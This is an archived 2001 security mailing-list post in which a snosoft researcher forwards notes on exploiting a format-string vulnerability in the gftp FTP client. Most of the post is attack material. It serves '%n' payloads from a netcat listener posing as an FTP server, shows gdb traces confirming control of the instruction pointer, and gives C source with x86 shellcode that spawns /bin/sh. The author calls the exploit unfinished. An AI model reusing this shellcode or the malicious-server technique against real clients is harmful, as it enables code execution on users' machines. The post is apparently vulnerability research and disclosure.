|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: KRF (dotslash
SNOSOFT.COM)Date: Fri Apr 27 2001 - 17:11:45 CDT
Here are some of the other ways of playing with gftp
that the SRTeam of snosoft.com have been playing with.
http://www.snosoft.com/SRTeam/srteam.html
-Krfinisterre
-------- Original Message --------
Subject: heres how to exploit gftp
Date: Sat, 21 Apr 2001 19:20:22 +0000
From: KRF <dotslashsnosoft.com>
Reply-To: krfinisterrecheckfree.com
To: reconsnosoft.com
here are some ideas... data can u help out...
(root)>./execve
shellcode addy: 0xbffff848
crtl C
(root)>echo -e "\x48\xf8\xff\xbf"
Høÿ¿
%n writes data to current frame see example...
(root)>echo -e "AAAA%n" > file
(root)>nc -l -p 21 < file
Program received signal SIGSEGV, Segmentation fault.
0x40325dd7 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0 0x40325dd7 in vfprintf () from /lib/libc.so.6
#1 0x40332bbc in vsprintf () from /lib/libc.so.6
#2 0x401ae8d2 in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0
#3 0x8111248 in ?? ()
Cannot access memory at address 0x41414141
sooooooooo knowing that we control the eip lets try to point it at some
shellcode.
(root)>echo -e "\x48\xf8\xff\xbf%n" > file
(root)>nc -l -p 21 < file
(gdb) run ftp://localhost
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/bin/gftp ftp://localhost
warning: Unable to find dynamic linker breakpoint function.
Program received signal SIG32, Real-time event 32.
0x4030617e in sigsuspend () from /lib/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x40325dd7 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0 0x40325dd7 in vfprintf () from /lib/libc.so.6
#1 0x40332bbc in vsprintf () from /lib/libc.so.6
#2 0x401ae8d2 in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0
#3 0x403c8010 in __morecore () from /lib/libc.so.6
#4 0x80beaf8 in ?? ()
#5 0xbffffa31 in ?? ()
#6 0x6e69622f in ?? ()
Cannot access memory at address 0x7273752f
(gdb) Quit
I have know idea where I ended up perhaps you can help ??
this is definately not the proper approach to this...
(root)>cat >
execve.c
main()
{
char hell[] =
/* main: */ /* setregid(12, 12); */
"\x29\xc0" /* subl %eax, %eax */
"\xb0\x47" /* movb $71, %al */
"\x29\xdb" /* subl %ebx, %ebx */
"\xb3\x0c" /* movb $12, %bl */
"\x89\xd9" /* movl %ebx, %ecx */
"\xcd\x80" /* int $0x80 */
"\xeb\x18" /* jmp callz */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\xe8\xe3\xff\xff\xff" /* call start */
"\x2f\x62\x69\x6e\x2f\x73\x68";
printf("shellcode addy: 0x%x\n", hell);
execl("/usr/bin/gftp", "gftp", "ftp://localhost", 0);
exit(0);
}
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]